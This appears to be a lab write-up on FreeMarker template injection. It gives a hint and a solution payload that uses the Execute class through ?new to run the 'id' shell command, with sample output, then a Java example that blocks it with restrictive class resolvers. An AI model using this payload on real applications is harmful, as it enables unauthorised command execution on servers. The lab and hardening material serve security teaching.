Freemarker

Command execution


Thanks to some features of Freemarker, it is possible to execute shell commands from a template.

Goal: Execute the id shell command

Hints

Hint #1

Try using the freemarker.template.utility.Execute class.

Solution


The solution was to find the class freemarker.template.utility.Execute, which allows a template to run an external process alongside the Java application.

Using this syntax: ${"freemarker.template.utility.Execute"?new()("COMMAND_SHELL")} it is possible to execute shell commands.

This would then have given: ${"freemarker.template.utility.Execute"?new()("id")} and it would have returned something like: "Hello uid=1000(admin) gid=1000(admin ) groups=1000(admin),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(kvm),120(lpadmin),132(lxd)\n!"
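
Mitigation side of the solution above, as an added example that is not part of the original lab: the ?new built-in resolves class names through the Configuration's new-builtin class resolver, which is unrestricted unless set. The class name NewBuiltinHardening, the "Hello ...!" wrapper and the FreeMarker version constant are assumptions.

```java
import freemarker.core.TemplateClassResolver;
import freemarker.template.Configuration;
import freemarker.template.Template;
import freemarker.template.TemplateException;
import java.io.IOException;
import java.io.StringReader;
import java.io.StringWriter;
import java.util.Collections;

// Added example; class name is hypothetical. Assumes FreeMarker 2.3.23+ on the classpath.
public class NewBuiltinHardening {

    // Template string from the lab solution above ("id" is the lab's goal command).
    static final String LAB_TEMPLATE =
        "Hello ${\"freemarker.template.utility.Execute\"?new()(\"id\")}!";

    // Builds a Configuration; a null resolver leaves FreeMarker's default in place.
    static Configuration config(TemplateClassResolver resolver) {
        Configuration cfg = new Configuration(Configuration.VERSION_2_3_23);
        if (resolver != null) {
            cfg.setNewBuiltinClassResolver(resolver);
        }
        return cfg;
    }

    // Renders the template; reports the first line of the error if FreeMarker refuses.
    static String render(Configuration cfg, String source) throws IOException {
        Template t = new Template("untrusted", new StringReader(source), cfg);
        StringWriter out = new StringWriter();
        try {
            t.process(Collections.emptyMap(), out);
            return "rendered: " + out.toString().trim();
        } catch (TemplateException e) {
            return "refused: " + String.valueOf(e.getMessage()).split("\n")[0];
        }
    }

    public static void main(String[] args) throws IOException {
        // Weak: nothing set, so the default UNRESTRICTED_RESOLVER lets ?new load Execute.
        System.out.println("default        -> " + render(config(null), LAB_TEMPLATE));
        // Corrected: SAFER_RESOLVER rejects Execute, ObjectConstructor and JythonRuntime.
        System.out.println("SAFER          -> "
            + render(config(TemplateClassResolver.SAFER_RESOLVER), LAB_TEMPLATE));
        // Strictest: ?new may not instantiate any class at all.
        System.out.println("ALLOWS_NOTHING -> "
            + render(config(TemplateClassResolver.ALLOWS_NOTHING_RESOLVER), LAB_TEMPLATE));
    }
}
```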
